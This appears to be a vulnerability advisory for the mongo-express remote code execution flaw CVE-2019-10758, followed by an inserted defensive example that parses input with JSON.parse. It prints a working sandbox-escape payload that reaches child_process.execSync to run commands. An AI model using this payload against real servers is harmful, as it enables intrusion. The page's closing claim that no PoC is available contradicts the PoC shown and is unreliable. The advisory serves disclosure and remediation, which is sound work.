mongo-express Remote Code Execution Vulnerability (CVE-2019-10758)

Published: 2025-04-13
Revised: 2025-04-13

## Overview

[mongo-express](https://github.com/mongo-express/mongo-express#readme) is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that use the `toBSON` method. The root cause is a misuse of the `vm` dependency: user input is executed through it in an environment that is not isolated, so `exec`-style commands can be run.

## PoC by Jonathan Leitschuh

```javascript
// MacOS
this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

it('should not be executable', function () {
  const test = `
    this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())
  `;
  const result = bson.toBSON(test);
});
```

## Remediation

Upgrade `mongo-express` to version 0.54.0 or higher.

## References

- [GitHub...
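As a defensive illustration added here (not mongo-express's own code and not its 0.54.0 patch), the hardened direction is to parse the user-supplied document as data instead of evaluating it through `vm`; `FORBIDDEN_KEYS`, `ObjectIdValue`, `safeToBSON` and `rejectionName` are hypothetical names:

```javascript
// Added defensive example, not mongo-express code: parse the user-supplied
// document as data. Evaluating it through Node's `vm` module, as the
// vulnerable versions did, gives no security boundary, which is the root
// cause of CVE-2019-10758. JSON.parse with a reviver cannot execute code.

// Keys that would let parsed input tamper with object prototypes.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Hypothetical stand-in for a BSON ObjectId built from the `$oid` form.
class ObjectIdValue {
  constructor(hex) {
    if (!/^[0-9a-f]{24}$/i.test(hex)) throw new TypeError('bad ObjectId');
    this.hex = hex.toLowerCase();
  }
}

// Reviver: JSON.parse calls it bottom-up for every key, so it can veto
// dangerous keys and promote {"$oid": "..."} objects to ObjectIdValue.
function reviver(key, value) {
  if (FORBIDDEN_KEYS.has(key)) throw new TypeError(`forbidden key: ${key}`);
  if (value && typeof value === 'object' && !Array.isArray(value)) {
    const keys = Object.keys(value);
    if (keys.length === 1 && typeof value.$oid === 'string') {
      return new ObjectIdValue(value.$oid);
    }
  }
  return value;
}

// Hypothetical replacement for a vm-based toBSON: strict JSON only.
// Any JavaScript, including the PoC string above, fails with SyntaxError
// instead of running, because nothing here evaluates the input.
function safeToBSON(input) {
  if (typeof input !== 'string' || input.length > 1000000) {
    throw new TypeError('document must be a string under 1 MB');
  }
  return JSON.parse(input, reviver);
}

// Helper for callers and tests: the error class name a bad input produces.
function rejectionName(input) {
  try { safeToBSON(input); return null; } catch (e) { return e.name; }
}
```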

No Exp or PoC currently available
Currently 0 affected-product entries